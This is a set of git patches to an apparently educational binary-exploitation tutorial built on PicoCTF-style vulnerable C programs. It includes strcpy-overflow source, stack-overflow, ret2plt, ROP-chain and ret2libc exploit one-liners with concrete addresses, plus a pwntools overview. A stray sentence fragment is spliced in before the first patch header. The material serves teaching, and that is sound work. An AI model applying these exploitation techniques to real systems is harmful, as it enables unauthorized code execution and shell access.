It might seem dumb to define this word, but sometimes with exploits you will only have the option to make an unreliable From 24911ba04e087e706e52551d6aa70a727fb3273a Mon Sep 17 00:00:00 2001 From: alichtman Date: Mon, 16 Apr 2018 02:09:54 -0500 Subject: [PATCH 35/48] Renamed overflow1.c and overflow1 binary files --- .../{overflow1-3948d17028101c40 => overflow1} | Bin intro-2/overflow1-3948d17028101c40.c | 32 ---------------- intro-2/overflow1.c | 36 ++++++++++++++++++ 3 files changed, 36 insertions(+), 32 deletions(-) rename intro-2/{overflow1-3948d17028101c40 => overflow1} (100%) delete mode 100644 intro-2/overflow1-3948d17028101c40.c create mode 100644 intro-2/overflow1.c diff --git a/intro-2/overflow1-3948d17028101c40 b/intro-2/overflow1 similarity index 100% rename from intro-2/overflow1-3948d17028101c40 rename to intro-2/overflow1 diff --git a/intro-2/overflow1-3948d17028101c40.c b/intro-2/overflow1-3948d17028101c40.c deleted file mode 100644 index ca8013f..0000000 --- a/intro-2/overflow1-3948d17028101c40.c +++ /dev/null @@ -1,32 +0,0 @@ -#include -#include -#include -#include -#include -#include "dump_stack.h" - -void vuln(int tmp, char *str) { - int win = tmp; - char buf[64]; - strcpy(buf, str); - dump_stack((void **) buf, 23, (void **) &tmp); - printf("win = %d\n", win); - if (win == 1) { - execl("/bin/sh", "sh", NULL); - } else { - printf("Sorry, you lose.\n"); - } - exit(0); -} - -int main(int argc, char **argv) { - if (argc != 2) { - printf("Usage: stack_overwrite [str]\n"); - return 1; - } - - uid_t euid = geteuid(); - setresuid(euid, euid, euid); - vuln(0, argv[1]); - return 0; -} diff --git a/intro-2/overflow1.c b/intro-2/overflow1.c new file mode 100644 index 0000000..4469808 --- /dev/null +++ b/intro-2/overflow1.c @@ -0,0 +1,36 @@ +#include +#include +#include +#include +#include +#include "dump_stack.h" + +void vuln(int tmp, char* str) +{ + int win = tmp; + char buf[64]; + strcpy(buf, str); + dump_stack((void**) buf, 23, (void**) &tmp); +
printf("win = %d\n", win); + + if (win == 1) { + execl("/bin/sh", "sh", NULL); + } else { + printf("Sorry, you lose.\n"); + } + + exit(0); +} + +int main(int argc, char** argv) +{ + if (argc != 2) { + printf("Usage: stack_overwrite [str]\n"); + return 1; + } + + uid_t euid = geteuid(); + setresuid(euid, euid, euid); + vuln(0, argv[1]); + return 0; +} From 6194b6f728ca7c2a3c915de3baf25a7b6143301f Mon Sep 17 00:00:00 2001 From: alichtman Date: Mon, 16 Apr 2018 02:10:28 -0500 Subject: [PATCH 36/48] Better explanations, word smithing --- intro-2/README.md | 34 ++++++++++++---------------------- 1 file changed, 12 insertions(+), 22 deletions(-) diff --git a/intro-2/README.md b/intro-2/README.md index 1ae6ec4..de6aa97 100644 --- a/intro-2/README.md +++ b/intro-2/README.md @@ -1,9 +1,8 @@ # Intro 2: Screwing around with the stack. -**Credit to [Picoctf 2013](2013.picoctf.com) for the binary and source used -here.** +**Credit to [Picoctf 2013](2013.picoctf.com) for the binary and source used here.** -Now that you've gotten your feet wet with binaries, it's time to dive in to exploitation with the stack. Consider the file [overflow1.c]() +Now that you've gotten your feet wet with binaries, it's time to dive into exploitation with the stack. Consider the file [overflow1.c](overflow1.c): ```C #include @@ -40,10 +39,7 @@ int main(int argc, char **argv) { } ``` -You can tell just by reading through this file that the obvious objective here is to -make `win == 1` a true statement, but we're going to ignore that for a few -minutes to learn about the stack. The stack is dynamic memory that the program -uses to store addresses, arguments, and all sorts of other goodies. +You can tell just by reading through this file that the obvious objective here is to make `win == 1` a true statement, but we're going to ignore that for a few minutes to learn about the stack. The stack is dynamic memory that the program uses to store addresses, arguments, and all sorts of other goodies.
Here's an example stack dump: @@ -79,10 +75,7 @@ win = 0 Sorry, you lose. ``` -Now if you know a thing or two about ASCII, you'll know that `0x41` is the value -of the character `A`. At the bottom of the stack dump, you'll notice that the beginning of -the buffer contains `0x41414141`, or our four `A`'s. Now we can run it again, only -this time we'll store a few more `A`'s. Pay attention to the addresses on the left :) +Now if you know a thing or two about ASCII, you'll know that `0x41` is the value of the character `A`. At the bottom of the stack dump, you'll notice that the beginning of the buffer contains `0x41414141`, or our four `A`'s. Now we can run it again, only this time we'll store a few more `A`'s. Pay attention to the addresses on the left :) ``` /overflow1-3948d17028101c40 $(python -c 'print "A"*76') @@ -127,21 +120,19 @@ char buf[64]; strcpy(buf, str); ``` -`strcpy()` is a dangerous function! Our buffer only holds 64 bytes, however, the buffer we provide contains 76 bytes. -And `strcpy()` doesn't care about checking lengths. +**`strcpy()` is a dangerous function!** -So what happens to those extra 12 bytes that don't fit? They just get thrown onto the -stack. +Our buffer only holds 64 bytes, but the string we ask `strcpy()` to copy contains 76 bytes. `strcpy()` does no length checking, so the extra 12 bytes that don't fit are written past the end of the buffer, over whatever sits next to it on the stack. -The value of `win` was stored right next to our buffer, so next, let's try to -set the value of `win` to `1`. +The value of `win` was stored right next to our buffer, so next let's try to set the value of `win` to `1`. This is where things get a bit tricky... -`"1"`, in string format, is `0x30` in hex. Note the different from integer `1`, which is `0x1` in hex, and isn't printable. +We need to be careful not to confuse characters and integers. The character `1` is `0x31` in hex, but the integer `1` is `0x1` in hex.
-Since `win` is right next to our buffer on the stack, we can just submit 64 `A`'s in character format, followed by a single `"\x01"` -to leak into the last byte of `win`, setting `win = 1`. +We want to set `win` equal to the *integer* representation of `1`, not the character representation of `1`. + +Since `win` is right after our buffer on the stack, we can just write 64 `A`'s in character format, followed by a single `"\x01"`. The 65th byte (`0x01`) overflows the buffer and lands in the lowest byte of `win`, which on little-endian x86 is enough to make `win = 1`. ``` $ ./overflow1-3948d17028101c40 $(python -c 'print "A"*64 + "\x01"') @@ -175,5 +166,4 @@ overflow1-3948d17028101c40 overflow1-3948d17028101c40.c README.md $ exit ``` -If you try this for yourself, you'll get a shell. You've now sucessfully -executed a buffer overflow attack! +If you try this for yourself, you'll get a shell. You've now successfully executed a buffer overflow attack! From 5ad8ccf14a4861779b0d025ebd0e1c0a2b96c42c Mon Sep 17 00:00:00 2001 From: alichtman Date: Mon, 16 Apr 2018 02:18:26 -0500 Subject: [PATCH 37/48] Rewrote sections of excercise-1 and added one important backreference in intro-2 --- exercise-1/README.md | 40 +++++++++++++++------------------------- intro-2/README.md | 2 +- 2 files changed, 16 insertions(+), 26 deletions(-) diff --git a/exercise-1/README.md b/exercise-1/README.md index 1a7266c..cfd9d8c 100644 --- a/exercise-1/README.md +++ b/exercise-1/README.md @@ -1,9 +1,9 @@ # The power of SEGFAULT - **Credit to [PicoCTF 2013](2013.picoctf.com) for problem** Consider our file for this exercise [overflow2.c](overflow2.c): + ```C #include #include @@ -28,27 +28,24 @@ int main(int argc, char **argv){ } ``` -Looking at the code for this program, you'll see they used `strcpy()` on our -argument. There are no size checks so we can easily try to overflow onto the -stack like before. You'll notice that there is no way `give_shell()` gets -called.
Not yet at least ;) +Looking at the code for this program, you'll see the function `strcpy()` is called with our argument as a parameter. Since there are no size checks on our input, we can try to manipulate the stack just like before. You'll notice that there is no way `give_shell()` gets called. Not yet at least ;) + ``` $ ./overflow2 $(python -c 'print "A"*24') Segmentation fault (core dumped) ``` -Segmentation fault? What's this? Simply put, a segmentation fault simply means -that the program tried to access an address that isn't there. Let's use -`strace` to see what's really happening. +Segmentation fault? What's this? Put simply, a segmentation fault means that the program tried to access memory it isn't allowed to touch, such as an address that isn't mapped. Let's use `strace` to see what's really happening. + ``` $ strace ./overflow2 $(python -c 'print "A"*32') ... ... --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x41414141} --- ``` -The address in question is `0x41414141`, or four "A"s. What does this mean? -Consider the disassembly of the function `vuln()`, as well as `main()` where -it's called. + +The address in question is `0x41414141`, or four "A"s. What does this mean? Consider the disassembly of the function `vuln()`, as well as `main()` where it's called. + ``` $ gdb -q ./overflow2 Reading symbols from ./overflow2...(no debugging symbols found)...done. @@ -71,27 +68,20 @@ Dump of assembler code for function vuln: 0x080484fb <+25>: ret End of assembler dump. ``` -So you might remember from [Intro 2](../intro-2) that you can overwrite values -on the stack with a `strcpy()` vulnerability. In the lines of `main()`, -control is passed to the function`vuln()`. However, `vuln()` needs to know where to -come back to in `main()` when it finishes. This is called a return address. In -this case, `vuln()` should jump back to `0x0804851b`, the instruction right after -`main()` calls `vuln()`.
When we get a SEGFAULT that we control, that means -that we've overwritten the return address. What can we do with this? The -possibilities are pretty much endless. You have control over the code's flow, -so maybe we can call some other function, namely `give_shell()` + +You might remember from [Intro 2](../intro-2) that you can overwrite values on the stack with a `strcpy()` vulnerability. In the lines of `main()`, control is passed to the function `vuln()`. However, `vuln()` needs to know where to return to in `main()` when it finishes. This is called a return address. In this case, `vuln()` should jump back to `0x0804851b`, the instruction right after `main()` calls `vuln()`. When the faulting address is one we supplied (here `0x41414141`), that means that we've overwritten the return address. What can we do with this? The possibilities are pretty much endless. You have control over the code's flow, so maybe we can call some other function, namely `give_shell()`. + ``` $ objdump -d overflow2 | grep give_shell 080484ad <give_shell>: ``` -Now that we have the address of a useful function, let's see if we can supply -*our own* return address. First, as you may remember from the last tutorial, -some of these characters aren't printable. We'll need to convert it to an -escape sequence and reverse the order, leaving us with this: `"\xad\x84\x04\x08"` -Now we can substitute it in! + +Now that we have the address of a useful function, let's see if we can supply *our own* return address. First, as you may remember from the last tutorial, some of these characters aren't printable. We'll need to convert it to an escape sequence and reverse the byte order (x86 is little-endian), leaving us with this: `"\xad\x84\x04\x08"`. Now we can substitute it in! + ``` $ ./overflow2 $(python -c 'print "A"*28 + "\xad\x84\x04\x08"') $ ls overflow2 overflow2.c README.md ``` + We now have a shell!
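
Editor's note on the byte order used in the exercise-1 exploit: the hand-reversed escape sequence can also be produced programmatically. This is a minimal Python 3 sketch, assuming the `give_shell()` address (`0x080484ad`) and the 28-byte padding quoted in this exercise. The helper name `pack_le32` and the constants `GIVE_SHELL` and `OFFSET` are illustrative and do not appear in the original write-up.

```python
import struct


def pack_le32(address):
    """Pack a 32-bit address into 4 little-endian bytes (lowest byte first)."""
    return struct.pack("<I", address)


# Values taken from the exercise text; treat them as assumptions on other builds.
GIVE_SHELL = 0x080484AD  # address reported by objdump for give_shell()
OFFSET = 28              # padding bytes written before the saved return address

# Padding followed by the new return address, as in the python -c one-liner.
payload = b"A" * OFFSET + pack_le32(GIVE_SHELL)
print(repr(payload))
```

The resulting bytes should match what the `python -c` one-liner passes to `./overflow2`. Using `struct.pack` only avoids reversing the address by hand; it does not change the exploit.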
diff --git a/intro-2/README.md b/intro-2/README.md index de6aa97..767aaf7 100644 --- a/intro-2/README.md +++ b/intro-2/README.md @@ -128,7 +128,7 @@ The value of `win` was stored right next to our buffer, so next let's try to set This is where things get a bit tricky... -We need to be careful not to confuse characters and integers. The character `1` is `0x30` in hex, but the integer `1` is `0x1` in hex. +We need to be careful not to confuse characters and integers. The character `1` is `0x31` in hex, but the integer `1` is `0x1` in hex (note that this is not printable). We want to set `win` equal to the *integer* representation of `1`, not the character representation of `1`. From 87a66889f61a59d2eb21996e25f1d09ddedf2153 Mon Sep 17 00:00:00 2001 From: alichtman Date: Mon, 16 Apr 2018 02:24:59 -0500 Subject: [PATCH 38/48] Collapsed paragraphs in README onto one line --- exercise-2/README.md | 40 +++++++++++++++------------------------- 1 file changed, 15 insertions(+), 25 deletions(-) diff --git a/exercise-2/README.md b/exercise-2/README.md index 940068f..3e751cb 100644 --- a/exercise-2/README.md +++ b/exercise-2/README.md @@ -1,8 +1,6 @@ # Build your own `system()` -Well, life is tough. Unlike in the first overflow exercise, I've made this one -so that you can't just call a specific function and get a shell. However, we'll -try to solve it anyways. +Well, life is tough. Unlike in the first overflow exercise, there's no included function that you can call to get a shell. But let's try and get a shell anyways. ```C # include @@ -23,10 +21,10 @@ int main(int argc, char **argv) { } ``` -Now unlike the last problem, you might notice that there is no call to -`system("/bin/sh")`. This means we're going to have to be a bit more clever. +Now unlike the last problem, you might notice that there is no call to `system("/bin/sh")`. This means we're going to have to be a bit more clever.
Let's take a look at the disassembly to learn a bit more about `system()` + ``` $ gdb -q ./overflow Reading symbols from ./overflow...(no debugging symbols found)...done. @@ -41,14 +39,9 @@ Dump of assembler code for function main: 0x08048559 <+76>: movl $0x804865e,(%esp) 0x08048560 <+83>: call 0x80483d0 <system@plt> ``` -Now what is `system@plt`? This is a crucial part. This binary is dynamically -linked. This means that the binary makes calls to an actual libc file that gets -put into memory. Luckily for us, dynamically linked binaries have PLT stubs. -Since ASLR randomizes libc addresses as well, the binary needs some way to -reliably call the functions it uses. The PLT is a wrapper function for the -actual code in libc. **The PLT is a part of the binary, it's address doesn't -change.** If you call `system@plt`, you'll call `system()`. So how are we going -to do this? Since the PLT is a part of the binary, we'll use `objdump`. + +Now what is `system@plt`? This is a crucial part. This binary is dynamically linked. This means that the binary makes calls to an actual libc file that gets put into memory. Luckily for us, dynamically linked binaries have PLT stubs. Since ASLR randomizes libc addresses as well, the binary needs some way to reliably call the functions it uses. Each PLT stub is a small wrapper for the actual code in libc. **The PLT is a part of the binary, so (without PIE) its address doesn't change.** If you call `system@plt`, you'll call `system()`. So how are we going to do this? Since the PLT is a part of the binary, we'll use `objdump`. + ``` $ objdump -d overflow | grep system 080483d0 <system@plt>: @@ -56,14 +49,15 @@ $ objdump -d overflow | grep system ``` Now let's try to break the binary. + ``` $ strace ./overflow $(python -c 'print "A"*44') ... --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x41414141} --- ``` -We get control of `$eip` after 40 bytes. `$eip` is the instruction pointer -register. This is the same as overwriting a return value.
It simply means that -we have control over the control flow. Now let's supply our address. + +We get control of `$eip` after 40 bytes. `$eip` is the instruction pointer register. This is the same as overwriting the saved return address: it means that we decide where execution goes next. Now let's supply our address. + ``` ./overflow $(python -c 'print "A"*40 + "\xd0\x83\x04\x08"') Good thing you don't have /bin/sh @@ -72,16 +66,12 @@ You Lose! sh: 1: ������: not found Segmentation fault (core dumped) ``` -Now this is really weird. What happened here is that we called `system()`. -We didn't provide any arguments for `system()` so it just pulled some junk from -the stack. Calling a function in an exploit has to take this form: + +Now this is really weird. What happened here is that we called `system()`. We didn't provide any arguments for `system()`, so it just pulled some junk from the stack. Calling a function in an exploit has to take this form: \[address of function\] \[return address\] \[argument\] -Now when the programmer wrote this, (I wrote this one :P) he thought he could -be smart and make fun of you for not having a `"/bin/sh"` string. However, he -didn't realize that by including that string in the code, the string is in the -binary. We can use `gdb` to find the string! +Now when the programmer wrote this (I wrote this one :P), he thought he could be smart and make fun of you for not having a `"/bin/sh"` string. However, he didn't realize that by including that string in the code, the string is in the binary. We can use `gdb` to find the string! ``` $ gdb -q ./overflow @@ -98,8 +88,8 @@ overflow : 0x804963a ("/bin/sh") libc : 0xf7f82a24 ("/bin/sh") ``` -Now you'll notice that two of these are in the binary. I'll just pick the first -one and run with it. +Now you'll notice that two of these are in the binary. I'll just pick the first one and run with it.
Finally, our finished exploit looks like so: + ``` ./overflow $(python -c 'print "A"*40 + "\xd0\x83\x04\x08" + "FAKE" + "\x3a\x86\x04\x08"') From c7fdbfbf55b9651cb74a58b7263b7b7dbcea803f Mon Sep 17 00:00:00 2001 From: alichtman Date: Mon, 16 Apr 2018 02:28:44 -0500 Subject: [PATCH 39/48] Removed peda-session-date.txt and peda-session-overflow.txt --- exercise-3/peda-session-date.txt | 3 --- exercise-3/peda-session-overflow.txt | 2 -- 2 files changed, 5 deletions(-) delete mode 100644 exercise-3/peda-session-date.txt delete mode 100644 exercise-3/peda-session-overflow.txt diff --git a/exercise-3/peda-session-date.txt b/exercise-3/peda-session-date.txt deleted file mode 100644 index 5290d54..0000000 --- a/exercise-3/peda-session-date.txt +++ /dev/null @@ -1,3 +0,0 @@ -break *main -disable - diff --git a/exercise-3/peda-session-overflow.txt b/exercise-3/peda-session-overflow.txt deleted file mode 100644 index 427566f..0000000 --- a/exercise-3/peda-session-overflow.txt +++ /dev/null @@ -1,2 +0,0 @@ -break *main - From 28dc875bd2cd6b47e66594762734ef58592a6b0e Mon Sep 17 00:00:00 2001 From: alichtman Date: Mon, 16 Apr 2018 02:44:38 -0500 Subject: [PATCH 40/48] Rewriting sections of excercise-3 --- exercise-3/README.md | 70 +++++++++++++++++--------------------------- 1 file changed, 27 insertions(+), 43 deletions(-) diff --git a/exercise-3/README.md b/exercise-3/README.md index 9fe8051..5d85810 100644 --- a/exercise-3/README.md +++ b/exercise-3/README.md @@ -28,33 +28,23 @@ int main(int argc, char **argv) { } ``` -As you'll remember from the previous exercise, putting `"/bin/sh"` in the binary -was a mistake. This problem is geared very similarly with a little bit of extra -finesse. First things first, we'll find the offset of `%eip` +As you'll remember from the previous exercise, putting `"/bin/sh"` in the binary was a mistake. This problem is geared very similarly with a little bit of extra finesse. 
First things first, we'll find the offset of `%eip` +As you'll remember from the previous exercise, putting `"/bin/sh"` in the binary was a mistake. This problem is set up very similarly, with a little bit of extra finesse. First things first, we'll find the offset of `%eip` -``` +```shell $ strace ./overflow $(python -c 'print "A"*76 + "BBBB"') ... --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424242} --- ``` -After 76 bytes we have `%eip`! From here we have to get a bit clever. If you -take anything from this exercise, it's this: **If it's in the binary without -PIE enabled, you have access to it.** This gives us access to the `strcat()` -and `strcpy()` functions. We can use these to cleverly get ourselves a shell. +After 76 bytes we have `%eip`! From here we have to get a bit clever. If you take anything from this exercise, it's this: **If a function is in the binary and PIE is not enabled, you have access to the function.** This means we can call the `strcat()` and `strcpy()` functions. We can use these to cleverly get ourselves a shell. -Now, for a quick introduction to the `.bss` segment. It is a part of the binary -used by linkers and compilers to initialize some variables (I think?). -Regardless of what the program uses the `.bss` for, just know that it's a -scratch pad for hackers. We can use it to reliably store data when the stack is -randomized. We could use the GOT, but it might mess up functions we need. -Knowing this, how can we get a shell? +Now, for a quick introduction to the `.bss` segment. `.bss` refers to the part of data memory used by many compilers and linkers for holding statically-allocated variables that are not explicitly initialized to any value. Regardless of what the program uses the `.bss` segment for, know that it's a scratch pad for hackers: it is writable and, without PIE, sits at a fixed address. We can use it to reliably store data when the stack is randomized. We could use the GOT, but it might mess up functions we need. Knowing this, how can we get a shell? -The answer lies in the functions used. We have the strings `"/b"` and `"in/"` in -the binary. We also have `"sh"` at the end of the second print statement! :D +The answer lies in the functions used.
We have the strings `"/b"` and `"in/"` in the binary. We also have `"sh"` at the end of the second print statement! :D Let's use `objdump` to get some function addresses: -``` + +```objdump $ objdump -d overflow | grep ">:" ... 08048370 : @@ -63,9 +53,9 @@ $ objdump -d overflow | grep ">:" 080483a0 : ``` -Next we will need to find the start of the `.bss` segment +Next, we will need to find the start of the `.bss` segment: -``` +```gdb $ gdb -q ./overflow Reading symbols from ./overflow...(no debugging symbols found)...done. gdb-peda$ info address __bss_start @@ -74,12 +64,16 @@ Symbol "__bss_start" is at 0x804a030 in a file compiled without debugging. Now our exploit (abstractly) is as follows: -``` -strcpy(&bss, &"/b" );strcat(&bss, &"in/");strcat(&bss,&"sh");system(&bss) +```c +strcpy(&bss, &"/b" ); +strcat(&bss, &"in/"); +strcat(&bss,&"sh"); +system(&bss) ``` We'll need the addresses of strings in the binary: -``` + +```gdb $ gdb -q ./overflow Reading symbols from ./overflow...(no debugging symbols found)...done. gdb-peda$ b*main @@ -104,26 +98,19 @@ overflow : 0x80486ce --> 0x75006873 ('sh') overflow : 0x80496ce --> 0x75006873 ('sh') ``` -Now with these we can learn one more important concept: Chaining Functions. -In order to chain functions together we need to somehow remove the arguments -off of the stack. As you know from before, standard x86 function calls look -like: +Now that we have everything we need, we can learn one more important concept: Chaining Functions. If you only need to call one function to get a shell, you don't need to chain. Otherwise, we need to chain functions. + +In order to chain functions together we need to somehow remove the arguments from the stack. As you know from before, standard x86 function calls look like: \[function address\] \[return address\] \[arg1\] \[arg2\] ... -If you only need to call one function to get a shell, you don't need to chain. 
-The first function will run, then the return address, then the program -will SEGFAULT when it tried to run the argument as code. We can't have the -program trying to run our arguments, so we need to pop them off of the stack. +The first function will run, then execution continues at the return address. If nothing cleans up the stack, the program will SEGFAULT when it tries to run an argument as code. We can't have the program trying to run our arguments, so we need to pop them off of the stack. -This requires our first ROPgadget. A ROPgadget is defined as being any set of -instructions in a binary that ends with a ret instruction. In order to find these, you can use -ropshell.com , gdb-peda, or ROPgadget. We need a pop;pop;ret gadget since we -need to pop two arguments off of the stack for every function call except -system. Since system is our last call, we don't need a pop ret gadget for it. +This requires the use of Return Oriented Programming, or a ROP exploit. ROP is built from gadgets: a gadget is any short sequence of instructions in a binary that ends with a `ret` instruction. In order to find these, you can use `ropshell.com`, `gdb-peda`, or `ROPgadget`. We need a `pop;pop;ret` gadget since we need to pop two arguments off of the stack for every function call except `system()`. Since `system()` is our last call, we don't need a `pop;ret` gadget for it. -I'll use gdb-peda -``` +I'm using `gdb-peda` in this example. + +```gdb $ gdb -q ./overflow Reading symbols from ./overflow...(no debugging symbols found)...done. gdb-peda$ b*main @@ -139,16 +126,14 @@ Searching for ROP gadget: '' in: binary ranges ``` Luckily for us, the binary has the gadget we need! Chaining functions will take -this form in our exploit (and future ones for that matter!) +this form in our exploit (and future ones, too!) \[&function\] \[&rop_gadget\] \[&arg1\] \[&arg2\] \[&next_function\] -You can use any amount of arguments as long as you have a rop gadget with -equally as many pops +You can use any number of arguments as long as you have a ROP gadget with the same number of pops.
Let's give the exploit a try: - ``` /overflow $(python -c 'print "A"*76 + "\x80\x83\x04\x08" + "\x3e\x86\x04\x08" + "\x30\xa0\x04\x08" + @@ -158,5 +143,4 @@ Let's give the exploit a try: "\xa0\x83\x04\x08" + "FAKE" + "\x30\xa0\x04\x08"') ``` -You should get a shell (Although it might be a weird one and not let you do -anything. I forgot to set privs :/ The concept still stands :P) +You should get a shell, although you won't be able to do much as we didn't set privs. The concept, however, still stands. From fc3dacf23b1728f313168704e7055295f20902dc Mon Sep 17 00:00:00 2001 From: alichtman Date: Mon, 16 Apr 2018 03:00:09 -0500 Subject: [PATCH 41/48] pwntools example rewrite and fixed incorrect information --- exercise-3.5/README.md | 56 +++++++++++++++++------------------------- 1 file changed, 23 insertions(+), 33 deletions(-) diff --git a/exercise-3.5/README.md b/exercise-3.5/README.md index b4f13d4..d06e561 100644 --- a/exercise-3.5/README.md +++ b/exercise-3.5/README.md @@ -1,72 +1,62 @@ -# pwntools +# pwntools Overview -## Attention: This is just an overview. - -## RTFM: https://pwntools.readthedocs.io +**Documentation: https://pwntools.readthedocs.io** First things first: -``` + +```python from pwn import * ``` That's just a generic import statement. -``` +```python context(arch='i386', os='linux') ``` -this just sets the context for other functions that we'll describe later. +This just sets the context for other functions that we'll describe later. -``` +```python binary = ELF("some_challenge") libc = ELF("some_libc") ``` -This part adds two ELF objects, binary and libc. ELF objects are supremely -useful; they give you access to a wide array of methods and data fields. -I almost always have both of these lines in my script, even if the libc one is -commented out. +This part adds two ELF objects, binary and libc. ELF objects are supremely useful -- they give you access to a wide array of methods and data fields. 
I almost always have both of these lines in my script, even if the libc one is commented out. -``` -r=process("./some_challenge") +```python +r = process("./some_challenge") ``` This simply executes the challenge (in the same directory.) Alternatively: -``` -r=remote("127.0.0.1",1337) #<-- Replace with actual HOST,PORT + +```python +r = remote("127.0.0.1", 1337) #<-- Replace with actual HOST,PORT ``` will run it remotely (many CTFs will not give you a full shell, just a host and -a port to connect to the binary) +a port to connect to the binary.) -Now many of you will remember taking adresses and turning them into python +Many of you will remember taking addresses and turning them into Python escape sequences by hand. -``` -say for example the address of write() in a binary is 0xdeadbeef -\xef\xbe\xed\xda -``` +If the address of the `write()` function is `0xdeadbeef`, the escaped address for `write()` would be `\xef\xbe\xad\xde`. -would be the resulting python escape. However, `pwntools` can take care of this. +`pwntools` can take care of this for us! -``` +```python write = p32(binary.symbols["write"]) ``` -this "packs" (converts to the escape seqence, sort of) the address of write for -us on a 32 bit machine. `p64()` also exists, for 64 bit machines. - +This "packs" the address of `write()` into its 4-byte little-endian form (the same bytes as the hand-written escape sequence) for a 32-bit target. `p64()` also exists, for 64-bit targets. Another thing to be cognizant of is the difference between Big and Little Endian memory encoding. Make sure you know what format the system you're writing an exploit for is using. -Assuming 'r' is an instantiated process or remote, you can now use these -methods to communicate with the binary +Assuming `r` is an instantiated process or remote, you can now use these methods to communicate with the binary.
-``` +```python r.sendline("This sends a string with a newline appended to the end") r.send("This also sends a string") ``` -Now me telling you all of this is kind of useless without you getting real -experience. **At this point I would strongly recommend solving the first 3 -challenges using pwntools.** +Reading this information is one thing. Getting real experience is another. +**At this point I would strongly recommend solving the first 3 challenges using pwntools.** From 7c77e123d4ee24d916832de4576f3b2270f2dfa9 Mon Sep 17 00:00:00 2001 From: alichtman Date: Mon, 16 Apr 2018 03:16:24 -0500 Subject: [PATCH 42/48] Rewrote excercise-4/README --- exercise-4/README.md | 121 ++++++++++++++++--------------------------- 1 file changed, 44 insertions(+), 77 deletions(-) diff --git a/exercise-4/README.md b/exercise-4/README.md index 87d0013..2530939 100644 --- a/exercise-4/README.md +++ b/exercise-4/README.md @@ -1,60 +1,38 @@ -# Pay a visit to your Local Library +# Pay your local library a visit -At this point you're probably used to hunting through binaries for useful -functions or code that you can use to get a shell. But what do you do without a -call to `system()`? +At this point you're probably used to hunting through binaries for useful functions or code that you can use to get a shell. But what do you do without a call to `system()`? The simple answer: get a shell anyways. :) -The long answer is a bit more complicated. This attack is called a return to -`libc`, or `ret2libc` for short. If you don't remember the PLT and GOT from before, -now is a good time to check the [glossary](../terms) and maybe do some -googling. You'll recall that ASLR randomizes the libc address, but the good -news is that with arbitrary `read()` and `write()` you can easily circumvent -this. +The long answer is a bit more complicated. This attack is called a "Return to `libc`", or `ret2libc` for short. 
If you don't remember the PLT and GOT from before, now is a good time to check the [glossary](../terms) and maybe do some googling. You'll recall that ASLR randomizes the libc address, but the good news is that with arbitrary `read()` and `write()` calls, you can easily circumvent this. -This binary has what we call Dynamic Input, which is some super fancy -ego-inflating jargon that means we can change inputs in the same program. -Basically any program where you can trigger the vulnerability twice (or more) with -different exploits in the same run is dynamic. If it still doesn't make sense, -just stay tuned. +This binary has what we call Dynamic Input, which is some super fancy ego-inflating jargon that means we can change inputs in the same program. Basically any program where you can trigger the vulnerability twice (or more) with different exploits in the same run is dynamic. If it still doesn't make sense, just stay tuned. If you haven't already, run through [Exercise 3.5: Intro to pwntools](../exercise-3.5) Seriously, go do that. -Now that you've made it this far, I'll give a brief overview of this style of -exploit. The libc functions that the PLT stubs call aren't just some magical -ethereal functions. They're real and they're mapped to a real page in memory -with an address that you can call if you're clever. **The entire libc is in -the binary.** From here, we exploit the fact that truly randomizing everything -is computationally expensive. Instead, ASLR only randomizes the **base -address** of the libc. This means that &function_1 - &function_2 is constant as -long as you're using the same libc file. With this in mind, the goal is to leak -(`write()`) the address of some libc function to stdout. we then take that -address, compute the address of system, call `main()` (or whatever function -contains the vulnerability) again, and call `system()` with the newly computed -address. 
+Now that you've made it this far, I'll give a brief overview of this style of exploit. The libc functions that the PLT stubs call aren't just some magical ethereal functions. They're real and they're mapped to a real page in memory with an address that you can call if you're clever. **The entire libc is in the binary.** From here, we exploit the fact that truly randomizing everything is computationally expensive. Instead, ASLR only randomizes the **base address** of the libc. This means that `&function_1 - &function_2` is constant as long as you're using the same libc file. With this in mind, the goal is to leak (`write()`) the address of some libc function to stdout. we then take that address, compute the address of system, call `main()` (or whatever function contains the vulnerability) again, and call `system()` with the newly computed address. Still confused? I was when I first learned this, but I'll try to explain as I go. First, we have to calculate the offset of `%eip` -``` + +```shell $ python -c 'print "A"*140 + "BBBB"' | strace ./exercise-4 ... --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424242} --- ``` -After 140 bytes, we have `%eip` +After `140 bytes`, we have `%eip` From here, we need to leak the address of a `libc` function. -We can do this by calling `write(1,&function,4)` +We can do this by calling `write(1, &function, 4)` -I'll be using the GOT address of `read()` (remember that the GOT is an array of -pointers into libc) +I'll be using the GOT address of `read()` (remember that the GOT is an array of pointers into libc) -``` +```objdump $ objdump -d exercise-4 | grep ">:a" ... 08048370 : @@ -68,37 +46,35 @@ $ objdump -R exercise-4 With these addresses, we get the following exploit. 
-``` +```shell python -c 'print "A"*140 + "\x70\x83\x04\x08" + "RETN" + "\x01\x00\x00\x00"+ "\x0c\xa0\x04\x08" + "\x04\x00\x00\x00"' | ./exercise-4 ``` If you go ahead and run this a few times, you'll get some weird outputs: -``` + +```shell �+o�Segmentation fault (core dumped) �kh�Segmentation fault (core dumped) ��n�Segmentation fault (core dumped) ``` -The four bytes before the SEGFAULT are the libc address. Now this is why we -need pwntools. +The four bytes before the SEGFAULT are the libc address. From here, we're going to run: -``` + +```shell $ ldd exercise-4 linux-gate.so.1 => (0xf76f9000) libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf753c000) /lib/ld-linux.so.2 (0xf76fa000) ``` -Since this is a local binary challenge, the `libc` file is just going to be -whatever the standard one is on your computer. **The same binary running on a -different machine could have a different `libc`, and therefore give you different results.** +Since this is a local binary challenge, the `libc` file is just going to be whatever the standard one is on your computer. **The same binary running on a different machine could have a different `libc`, and therefore give you different results.** -All we have to do is grab a copy of that `libc` and put it in our directory -If you ever exploit a remote binary and you don't have the `libc`, there are -plenty of places you can get them online. -``` +All we have to do is grab a copy of that `libc` and put it in our directory. If you ever exploit a remote binary and you don't have the `libc`, there are plenty of places you can get them online. + +```shell $ cp /lib/i386-linux-gnu/libc.so.6 ./ ``` @@ -112,13 +88,12 @@ context(arch='i386', os='linux') # <-- Add the architecture and os binary = ELF("exercise-4") libc = ELF("libc.so.6") -r=process("./exercise-4") +r = process("./exercise-4") ``` -after this, we know we'll need the `read()`,`write()`, the GOT address of -`read()`, and a `pop 